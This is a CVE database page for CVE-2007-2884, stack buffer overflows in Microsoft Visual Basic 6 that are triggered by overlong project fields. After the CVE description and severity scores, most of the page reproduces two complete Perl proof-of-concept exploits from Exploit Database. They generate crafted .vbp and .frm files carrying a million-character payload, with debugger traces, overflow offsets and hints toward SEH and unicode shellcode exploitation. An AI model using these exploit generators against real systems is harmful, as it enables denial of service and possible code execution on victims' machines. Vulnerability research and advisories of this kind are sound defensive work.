CVE-2007-2884
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Multiple stack-based buffer overflows in Microsoft Visual Basic 6 allow user-assisted remote attackers to cause a denial of service (CPU consumption) or execute arbitrary code via a Visual Basic Project (vbp) file with a long (1) Description or (2) Company Name (VersionCompanyName) field.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
||
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 3976
Publication date : 2007-05-22 22h00 +00:00
Author : UmZ
EDB Verified : Yes
#!/usr/local/bin/perl
#Discovered By UmZ (Umair Manzoor)
#comments are welcome at umz32.dll[at]gmail.com
#Dated 23-02-2007
#Time : 02:00 AM PST
#
#Visual Basic Project (Company Name) Stack Overflow
#Affected Version : Tested on Visual basic 6
#Threats : DoS, Previlidges Escilation (System become unstable for more then 40 minutes and so)
#From : Local system
#
#Actually Exception occur again and again and again make 100% usage of CPU
#
#
#*The vulnerability would not effect until the project description (Project Property page and select Company Name) has been opened up to view.
#
#*When binary file is generated with crafted Visual basic project it would not contain any details of vendor and other information.
#Details:
# Owned Registers are ESI and EDI. Compnay name is dumped at Memory Address of : 04520020. Due to stack overflow USER32 stuck into loop (that last # for more then 30 minutes in testing).
#
# The CPU usuage becomes 100% causing the system to become unstable and can crash the OS if enduser is on low system memory. This vulnerability can
# be exploit to cause DOS or Previledge escilation. UNICODE exploitation must be implemented in order to exploit this vulnerability.
# The generated Binary File is also attached which cann't display any of details of vendor information in EXE format (due to overflow).
#
#Debug Details:
# This is the debug details which clearly mention the loop in which exception got stuck, causing it to occur again and again
#
#77D8D96F 837D F8 00 CMP DWORD PTR SS:[EBP-8],0
#77D8D973 74 08 JE SHORT USER32.77D8D97D
#77D8D975 3C 20 CMP AL,20
#77D8D977 74 04 JE SHORT USER32.77D8D97D
#77D8D979 3C 09 CMP AL,9
#77D8D97B 75 2C JNZ SHORT USER32.77D8D9A9
#77D8D97D 3C 0D CMP AL,0D
#77D8D97F 74 28 JE SHORT USER32.77D8D9A9
#77D8D981 50 PUSH EAX
#77D8D982 53 PUSH EBX
#77D8D983 E8 68FAFFFF CALL USER32.77D8D3F0
#77D8D988 85C0 TEST EAX,EAX
#77D8D98A 75 1D JNZ SHORT USER32.77D8D9A9
#77D8D98C 47 INC EDI
#77D8D98D 8A07 MOV AL,BYTE PTR DS:[EDI]
#77D8D98F 3C 20 CMP AL,20
#77D8D991 74 04 JE SHORT USER32.77D8D997
#77D8D993 3C 09 CMP AL,9
#77D8D995 75 07 JNZ SHORT USER32.77D8D99E
#77D8D997 C745 F8 01000000 MOV DWORD PTR SS:[EBP-8],1
#77D8D99E 807F FF 0A CMP BYTE PTR DS:[EDI-1],0A
#77D8D9A2 74 05 JE SHORT USER32.77D8D9A9
#77D8D9A4 3B7D 10 CMP EDI,DWORD PTR SS:[EBP+10]
#77D8D9A7 ^72 C6 JB SHORT USER32.77D8D96F
#
#
#Values of Register are as follows:
#EAX 00000041
#ECX 09E0C300
#EDX 00150608
#EBX 001DC0C0
#ESP 0013E900
#EBP 0013E914
#ESI 04520020 ASCII #"AAAAAAAAAAAAAAAAA......... truncated
#EDI 045E61D0 ASCII #"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... truncated
#EIP 77D8D96F USER32.77D8D96F
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
# This exploit is just POC, it will generate the crafted VB project.
print("\nVisual Basic Company Name Stack overflow");
print("\nAffected Version : Tested on Visual basic 6");
print("\nThreats : DoS, Previlidges Escilation");
print("\nFrom : Local system");
print("\n----------------------------------------------");
print("\nDiscovered & Coded by UmZ");
print("\numz32.dll[at]gmail.com");
open (MYFILE, '>>Form2.frm');
print MYFILE "VERSION 5.00\n";
print MYFILE "Begin VB.Form Form1\n";
print MYFILE q(Caption = "Form1");
print MYFILE "\nClientHeight = 3495\n";
print MYFILE "ClientLeft = 60\n";
print MYFILE "ClientTop = 345\n";
print MYFILE "ClientWidth = 4680\n";
print MYFILE q(LinkTopic = "Form1");
print MYFILE "\nScaleHeight = 3495\n";
print MYFILE "ScaleWidth = 4680\n";
print MYFILE "StartUpPosition = 3 'Windows Default\n";
print MYFILE "Begin VB.CommandButton Command2\n";
print MYFILE q(Caption = "write");
print MYFILE "\nHeight = 495\n";
print MYFILE "Left = 2400\n";
print MYFILE "TabIndex = 2\n";
print MYFILE "Top = 2640\n";
print MYFILE "Width = 1935\n";
print MYFILE "End\n";
print MYFILE "Begin VB.TextBox Text1\n";
print MYFILE "Height = 2175\n";
print MYFILE "Left = 480\n";
print MYFILE "MultiLine = -1 'True\n";
print MYFILE "TabIndex = 1\n";
print MYFILE q(Text = "Form1.frx":0000);
print MYFILE "\nTop = 360\n";
print MYFILE "Width = 3855\n";
print MYFILE "End\n";
print MYFILE "Begin VB.CommandButton Command1\n";
print MYFILE q(Caption = "read");
print MYFILE "\nHeight = 495\n";
print MYFILE "Left = 480\n";
print MYFILE "TabIndex = 0\n";
print MYFILE "Top = 2640\n";
print MYFILE "Width = 1935\n";
print MYFILE "End\n";
print MYFILE "End\n";
print MYFILE q(Attribute VB_Name = "Form1");
print MYFILE "\nAttribute VB_GlobalNameSpace = False\n";
print MYFILE "Attribute VB_Creatable = False\n";
print MYFILE "Attribute VB_PredeclaredId = True\n";
print MYFILE "Attribute VB_Exposed = False\n";
close (MYFILE);
open (MYFILE, '>>vuln2.vbp');
print MYFILE "Type=Exe\n";
print MYFILE "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINDOWS\\system32\\stdole2.tlb#OLE Automation\n";
print MYFILE "Reference=*\\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\\..\\..\\..\\WINDOWS\\system32\\scrrun.dll#Microsoft Scripting Runtime\n";
print MYFILE "Form=Form2.frm\n";
print MYFILE q(Startup="Form2");
print MYFILE "\nHelpFile=".q("");
print MYFILE "\nCommand32=".q("");
print MYFILE "\nName=".q("Project1");
print MYFILE "\nHelpContextID=".q("0");
#print MYFILE "\nDescription=".q(")."A" x1037690 .q(");
print MYFILE "\nCompatibleMode=".q("0");
print MYFILE "\nMajorVer=1";
print MYFILE "\nMinorVer=0";
print MYFILE "\nRevisionVer=0";
print MYFILE "\nAutoIncrementVer=0";
print MYFILE "\nServerSupportFiles=0";
print MYFILE "\nVersionCompanyName=".q(")."A" x1037690 .q(");
print MYFILE "\nCompilationType=0";
print MYFILE "\nOptimizationType=0";
print MYFILE "\nFavorPentiumPro(tm)=0";
print MYFILE "\nCodeViewDebugInfo=0";
print MYFILE "\nNoAliasing=0";
print MYFILE "\nBoundsCheck=0";
print MYFILE "\nOverflowCheck=0";
print MYFILE "\nFlPointCheck=0";
print MYFILE "\nFDIVCheck=0";
print MYFILE "\nUnroundedFP=0";
print MYFILE "\nStartMode=0";
print MYFILE "\nUnattended=0";
print MYFILE "\nRetained=0";
print MYFILE "\nThreadPerObject=0";
print MYFILE "\nMaxNumberOfThreads=1";
print MYFILE "\n[MS Transaction Server]";
print MYFILE "\nAutoRefresh=1";
close (MYFILE);
print("\n\nCrafted Project has been generated!!!\n\n");
# milw0rm.com [2007-05-23]
Exploit Database EDB-ID : 3977
Publication date : 2007-05-22 22h00 +00:00
Author : UmZ
EDB Verified : Yes
#!/usr/local/bin/perl
#Discovered By UmZ (Umair Manzoor)
#comments are welcome at umz32.dll[at]gmail.com
#Dated 23-02-2007
#Time : 02:00 AM PST
#
#Stack Overflow
#Buffer Size 1037690
#overflow offset 004A2E43
#EBX contain values
#Memory to write 03B50188
#
#
#
#
#Visual Basic Project Description Stack overflow
#Affected Version : Tested on Visual basic 6
#Threats : DoS, Previlidges Escilation
#From : Local system
#
#
#Details:
# Microsoft Visual Basic 6.0 IDE crashes while parsing the project detail's field when characters more then 1037690 are provided,
# causing stack overflow (vuln1.vbp in attached file). The data is stored as UNICODE means that Shellcode can be injected in unicode manner
# to escilate previledges.
# As soon as the stack get overflow, an exception occur and NTDLL start handling it => means that SEH based exploitation will work.
# Offset is mentioned above at which IDE crash. Register EBX contain the malicious values.
# Memory address at which the malicous data (Project detail) are dumped is: 03EF0189 and on words.
#
#OVERFLOW CODE n Instructions:
#
#004A2E43 |. 8501 TEST DWORD PTR DS:[ECX],EAX
#004A2E45 |. 3D 00100000 CMP EAX,1000
#004A2E4A |.^73 EC JNB SHORT VB6.004A2E38
#004A2E4C \.^EB DB JMP SHORT VB6.004A2E29
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
# This exploit is just POC, it will generate the crafted VB project.
print("\nVisual Basic Project Description Stack overflow");
print("\nAffected Version : Tested on Visual basic 6");
print("\nThreats : DoS, Previlidges Escilation");
print("\nFrom : Local system");
print("\n----------------------------------------------");
print("\nDiscovered & Coded by UmZ");
print("\numz32.dll[at]gmail.com");
open (MYFILE, '>>Form1.frm');
print MYFILE "VERSION 5.00\n";
print MYFILE "Begin VB.Form Form1\n";
print MYFILE q(Caption = "Form1");
print MYFILE "\nClientHeight = 3495\n";
print MYFILE "ClientLeft = 60\n";
print MYFILE "ClientTop = 345\n";
print MYFILE "ClientWidth = 4680\n";
print MYFILE q(LinkTopic = "Form1");
print MYFILE "\nScaleHeight = 3495\n";
print MYFILE "ScaleWidth = 4680\n";
print MYFILE "StartUpPosition = 3 'Windows Default\n";
print MYFILE "Begin VB.CommandButton Command2\n";
print MYFILE q(Caption = "write");
print MYFILE "\nHeight = 495\n";
print MYFILE "Left = 2400\n";
print MYFILE "TabIndex = 2\n";
print MYFILE "Top = 2640\n";
print MYFILE "Width = 1935\n";
print MYFILE "End\n";
print MYFILE "Begin VB.TextBox Text1\n";
print MYFILE "Height = 2175\n";
print MYFILE "Left = 480\n";
print MYFILE "MultiLine = -1 'True\n";
print MYFILE "TabIndex = 1\n";
print MYFILE q(Text = "Form1.frx":0000);
print MYFILE "\nTop = 360\n";
print MYFILE "Width = 3855\n";
print MYFILE "End\n";
print MYFILE "Begin VB.CommandButton Command1\n";
print MYFILE q(Caption = "read");
print MYFILE "\nHeight = 495\n";
print MYFILE "Left = 480\n";
print MYFILE "TabIndex = 0\n";
print MYFILE "Top = 2640\n";
print MYFILE "Width = 1935\n";
print MYFILE "End\n";
print MYFILE "End\n";
print MYFILE q(Attribute VB_Name = "Form1");
print MYFILE "\nAttribute VB_GlobalNameSpace = False\n";
print MYFILE "Attribute VB_Creatable = False\n";
print MYFILE "Attribute VB_PredeclaredId = True\n";
print MYFILE "Attribute VB_Exposed = False\n";
close (MYFILE);
open (MYFILE, '>>vuln1.vbp');
print MYFILE "Type=Exe\n";
print MYFILE "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINDOWS\\system32\\stdole2.tlb#OLE Automation\n";
print MYFILE "Reference=*\\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\\..\\..\\..\\WINDOWS\\system32\\scrrun.dll#Microsoft Scripting Runtime\n";
print MYFILE "Form=Form1.frm\n";
print MYFILE q(Startup="Form1");
print MYFILE "\nHelpFile=".q("");
print MYFILE "\nCommand32=".q("");
print MYFILE "\nName=".q("Project1");
print MYFILE "\nHelpContextID=".q("0");
print MYFILE "\nDescription=".q(")."A" x1037690 .q(");
print MYFILE "\nCompatibleMode=".q("0");
print MYFILE "\nMajorVer=1";
print MYFILE "\nMinorVer=0";
print MYFILE "\nRevisionVer=0";
print MYFILE "\nAutoIncrementVer=0";
print MYFILE "\nServerSupportFiles=0";
print MYFILE "\nVersionCompanyName=".q("");
print MYFILE "\nCompilationType=0";
print MYFILE "\nOptimizationType=0";
print MYFILE "\nFavorPentiumPro(tm)=0";
print MYFILE "\nCodeViewDebugInfo=0";
print MYFILE "\nNoAliasing=0";
print MYFILE "\nBoundsCheck=0";
print MYFILE "\nOverflowCheck=0";
print MYFILE "\nFlPointCheck=0";
print MYFILE "\nFDIVCheck=0";
print MYFILE "\nUnroundedFP=0";
print MYFILE "\nStartMode=0";
print MYFILE "\nUnattended=0";
print MYFILE "\nRetained=0";
print MYFILE "\nThreadPerObject=0";
print MYFILE "\nMaxNumberOfThreads=1";
print MYFILE "\n[MS Transaction Server]";
print MYFILE "\nAutoRefresh=1";
close (MYFILE);
print("\n\nCrafted Project has been generated!!!\n\n");
# milw0rm.com [2007-05-23]
Products Mentioned
Configuraton 0
Microsoft>>Visual_basic >> Version 6.0
- Microsoft>>Visual_basic >> Version 6.0 (Open CPE detail)
- Microsoft>>Visual_basic >> Version 6.0 (Open CPE detail)
